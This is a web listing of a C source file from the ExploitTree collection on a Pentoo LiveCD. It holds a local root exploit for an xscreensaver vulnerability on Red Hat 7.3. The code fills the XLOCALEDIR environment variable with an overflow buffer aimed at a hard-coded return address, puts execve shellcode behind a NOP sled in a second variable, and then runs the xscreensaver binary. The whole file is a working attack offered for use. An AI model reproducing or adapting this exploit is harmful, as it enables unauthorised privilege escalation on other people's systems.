home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / xscreensaver.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.3 KB  |  49 lines
  1. /*
  2. **
  3. ** Tested on rh 7.3 using XFree86
  4. ** xscreensaver vulnerability
  5. ** AUTHORS: Angelo Rosiello (Guilecool) & deka
  6. ** REQUIRES: X must be run!
  7. ** EFFECTS: local root exploit!
  8. **
  9. ** deka is leet brother, thank you :>
  10. ** MAIL: guilecool@usa.com
  11. **
  12. */
  13.  
  14. #include <stdio.h>
  15. #include <string.h>
  16. #include <unistd.h>
  17. #include <stdlib.h>
  18. #include <sys/types.h>
  19. #include <sys/stat.h>
  20. #include <fcntl.h>
  21.  
  22. #define RETADDR 0xbfffdf20 //change it if u need
  23.  
  24. char shellcode[] =
  25.  "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
  26.  "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
  27.  "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
  28.  "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
  29.  "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
  30.  "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
  31.  "\xc0\x40\xcd\x80";
  32.  
  33. int main()
  34. {
  35.         char buf[4076];
  36.         unsigned long retaddr = RETADDR;
  37.  
  38.         memset(buf, 0x0, 4076);
  39.         memset(buf, 0x41, 4072);
  40.         memcpy(buf+2076, &retaddr, 0x4);
  41.         setenv("XLOCALEDIR", buf, 1);
  42.         memset(buf, 0x90, 4072);
  43.         memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
  44. (shellcode));
  45.         setenv("HAXHAX", buf, 1);
  46.         execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);
  47. }
  48.  
  49.